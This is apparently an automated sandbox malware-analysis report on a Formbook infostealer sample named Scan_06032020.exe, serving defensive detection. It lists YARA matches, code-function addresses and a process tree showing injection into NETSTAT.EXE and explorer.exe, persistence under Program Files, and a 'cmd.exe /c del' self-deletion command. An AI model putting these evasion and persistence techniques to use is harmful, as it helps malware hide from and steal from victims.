Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_03429810
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_034BD016
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_0342E020
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_03420021
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_034248CB
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_034C28E8
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_0340A080
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_034A18B6
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_034C1746
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_034C1FCE
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_034B2782
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_03415790
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_03417640
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_03424E61
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_034BCE66
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_03425E70
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_03426611
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_034C26F8
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_034B3E96
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_034B1D1B
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_034C2519
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_03411530
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_0349C53F
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_033F0D40
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_034AFDDB
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_034BD5D2
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_034A1DE3
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_0349E58A
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_034BE581
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_0342547E
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_0340740C
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_03411410
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_034AF42B
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_034BDCC5
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_034B44EF
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_034C1C9F
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 6_2_034C2C9A
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_034B34906_2_034B3490
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_02E7D9C86_2_02E7D9C8
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_02E7DEEC6_2_02E7DEEC
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_02E62FB06_2_02E62FB0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_02E69F606_2_02E69F60
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_02E69F5B6_2_02E69F5B
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_02E62D896_2_02E62D89
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_02E62D906_2_02E62D90
Source: C:\Program Files (x86)\Qor0xv4i\ufipp6ljxlz.exe Code function: 16_2_0A05F798
Source: C:\Program Files (x86)\Qor0xv4i\ufipp6ljxlz.exe Code function: 16_2_0A05F797
Source: C:\Program Files (x86)\Qor0xv4i\ufipp6ljxlz.exe Code function: 16_2_0B444151
Source: C:\Program Files (x86)\Qor0xv4i\ufipp6ljxlz.exe Code function: 16_2_0B4430D8
Source: C:\Program Files (x86)\Qor0xv4i\ufipp6ljxlz.exe Code function: 16_2_0B442650
Source: C:\Program Files (x86)\Qor0xv4i\ufipp6ljxlz.exe Code function: 16_2_0B444490
Source: C:\Program Files (x86)\Qor0xv4i\ufipp6ljxlz.exe Code function: 16_2_0B444207
Source: C:\Program Files (x86)\Qor0xv4i\ufipp6ljxlz.exe Code function: 16_2_0B44310D
Source: C:\Program Files (x86)\Qor0xv4i\ufipp6ljxlz.exe Code function: 16_2_0B441020
Source: C:\Program Files (x86)\Qor0xv4i\ufipp6ljxlz.exe Code function: 16_2_0B441030
Source: C:\Program Files (x86)\Qor0xv4i\ufipp6ljxlz.exe Code function: 16_2_0B4430C9
Source: C:\Program Files (x86)\Qor0xv4i\ufipp6ljxlz.exe Code function: 17_2_00401030
Source: C:\Program Files (x86)\Qor0xv4i\ufipp6ljxlz.exe Code function: 17_2_0041D9C8
Source: C:\Program Files (x86)\Qor0xv4i\ufipp6ljxlz.exe Code function: 17_2_00402D89
Source: C:\Program Files (x86)\Qor0xv4i\ufipp6ljxlz.exe Code function: 17_2_00402D90
Source: C:\Program Files (x86)\Qor0xv4i\ufipp6ljxlz.exe Code function: 17_2_0041DEEC
Source: C:\Program Files (x86)\Qor0xv4i\ufipp6ljxlz.exe Code function: 17_2_00409F5B
Source: C:\Program Files (x86)\Qor0xv4i\ufipp6ljxlz.exe Code function: 17_2_00409F60
Source: C:\Program Files (x86)\Qor0xv4i\ufipp6ljxlz.exe Code function: 17_2_00402FB0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: String function: 03485110 appears 38 times
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: String function: 0344DDE8 appears 43 times
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: String function: 033FB0E0 appears 176 times
Source: Scan_06032020.exe Binary or memory string: OriginalFilename vs Scan_06032020.exe
Source: Scan_06032020.exe, 00000000.00000002.555559475.00000000006C2000.00000002.00020000.sdmp Binary or memory string: OriginalFilenamebTNGxFYZxVhlZk.exe6 vs Scan_06032020.exe
Source: Scan_06032020.exe, 00000000.00000002.565029549.000000000B130000.00000002.00000001.sdmp Binary or memory string: OriginalFilenamemscorrc.dllT vs Scan_06032020.exe
Source: Scan_06032020.exe, 00000000.00000000.528970707.0000000000652000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameNvidiaCache.dll8 vs Scan_06032020.exe
Source: Scan_06032020.exe, 00000000.00000002.556283565.0000000000DD0000.00000004.00000020.sdmp Binary or memory string: OriginalFilenameclr.dllT vs Scan_06032020.exe
Source: Scan_06032020.exe Binary or memory string: OriginalFilename vs Scan_06032020.exe
Source: Scan_06032020.exe, 00000002.00000002.551467733.00000000003E2000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameNvidiaCache.dll8 vs Scan_06032020.exe
Source: Scan_06032020.exe, 00000002.00000002.551670785.0000000000452000.00000002.00020000.sdmp Binary or memory string: OriginalFilenamebTNGxFYZxVhlZk.exe6 vs Scan_06032020.exe
Source: Scan_06032020.exe Binary or memory string: OriginalFilename vs Scan_06032020.exe
Source: Scan_06032020.exe, 00000003.00000000.552652444.00000000001B2000.00000002.00020000.sdmp Binary or memory string: OriginalFilenamebTNGxFYZxVhlZk.exe6 vs Scan_06032020.exe
Source: Scan_06032020.exe, 00000003.00000000.552510795.0000000000142000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameNvidiaCache.dll8 vs Scan_06032020.exe
Source: Scan_06032020.exe Binary or memory string: OriginalFilename vs Scan_06032020.exe
Source: Scan_06032020.exe, 00000004.00000002.606369972.0000000001C9F000.00000040.00000001.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs Scan_06032020.exe
Source: Scan_06032020.exe, 00000004.00000000.554340459.0000000000EA2000.00000002.00020000.sdmp Binary or memory string: OriginalFilenamebTNGxFYZxVhlZk.exe6 vs Scan_06032020.exe
Source: Scan_06032020.exe, 00000004.00000002.603915424.0000000000FF0000.00000040.00000001.sdmp Binary or memory string: OriginalFilenamenetstat.exej% vs Scan_06032020.exe
Source: Scan_06032020.exe, 00000004.00000000.554197147.0000000000E32000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameNvidiaCache.dll8 vs Scan_06032020.exe
Source: Scan_06032020.exe Binary or memory string: OriginalFilenameNvidiaCache.dll8 vs Scan_06032020.exe
Source: Scan_06032020.exe Binary or memory string: OriginalFilenamebTNGxFYZxVhlZk.exe6 vs Scan_06032020.exe
Source: C:\Windows\SysWOW64\NETSTAT.EXE Registry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Mozilla\Mozilla Firefox\63.0.3 (x86 en-US)\Main Install Directory
Source: C:\Windows\explorer.exe Section loaded: comsvcs.dll
Source: 00000011.00000002.893109948.0000000000EB0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000011.00000002.893109948.0000000000EB0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000010.00000002.882570238.0000000004AEC000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000010.00000002.882570238.0000000004AEC000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.604818443.0000000001460000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.604818443.0000000001460000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.1159857332.0000000002E60000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.1159857332.0000000002E60000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.558930048.00000000043CC000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.558930048.00000000043CC000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000011.00000002.891510039.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000011.00000002.891510039.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000012.00000002.895810906.0000000000340000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000012.00000002.895810906.0000000000340000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.1157158132.0000000000AE0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.1157158132.0000000000AE0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.604415201.00000000013D0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.604415201.00000000013D0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.603513720.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.603513720.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000011.00000002.893009636.0000000000E80000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000011.00000002.893009636.0000000000E80000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 4.2.Scan_06032020.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 4.2.Scan_06032020.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 17.2.ufipp6ljxlz.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 17.2.ufipp6ljxlz.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 17.2.ufipp6ljxlz.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 17.2.ufipp6ljxlz.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 4.2.Scan_06032020.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 4.2.Scan_06032020.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: Scan_06032020.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: ufipp6ljxlz.exe.5.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@16/8@9/4
Source: C:\Users\user\Desktop\Scan_06032020.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Scan_06032020.exe.log
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4640:120:WilError_01
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\Qor0xv4i
Source: Scan_06032020.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\Scan_06032020.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\5e7364da399b604ae01baff696551080\mscorlib.ni.dll
Source: C:\Program Files (x86)\Qor0xv4i\ufipp6ljxlz.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\5e7364da399b604ae01baff696551080\mscorlib.ni.dll
Source: C:\Windows\explorer.exe File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\Scan_06032020.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\NETSTAT.EXE File read: C:\Windows\System32\drivers\etc\hosts
Source: Scan_06032020.exe Virustotal: Detection: 16%
Source: Scan_06032020.exe ReversingLabs: Detection: 48%
Source: unknown Process created: C:\Users\user\Desktop\Scan_06032020.exe 'C:\Users\user\Desktop\Scan_06032020.exe'
Source: unknown Process created: C:\Users\user\Desktop\Scan_06032020.exe {path}
Source: unknown Process created: C:\Users\user\Desktop\Scan_06032020.exe {path}
Source: unknown Process created: C:\Users\user\Desktop\Scan_06032020.exe {path}
Source: unknown Process created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Scan_06032020.exe'
Source: unknown Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Program Files (x86)\Qor0xv4i\ufipp6ljxlz.exe C:\Program Files (x86)\Qor0xv4i\ufipp6ljxlz.exe
Source: unknown Process created: C:\Program Files (x86)\Qor0xv4i\ufipp6ljxlz.exe {path}
Source: unknown Process created: C:\Windows\SysWOW64\wlanext.exe C:\Windows\SysWOW64\wlanext.exe
Source: C:\Users\user\Desktop\Scan_06032020.exe Process created: C:\Users\user\Desktop\Scan_06032020.exe {path}
Source: C:\Users\user\Desktop\Scan_06032020.exe Process created: C:\Users\user\Desktop\Scan_06032020.exe {path}
Source: C:\Users\user\Desktop\Scan_06032020.exe Process created: C:\Users\user\Desktop\Scan_06032020.exe {path}
Source: C:\Windows\explorer.exe Process created: C:\Program Files (x86)\Qor0xv4i\ufipp6ljxlz.exe C:\Program Files (x86)\Qor0xv4i\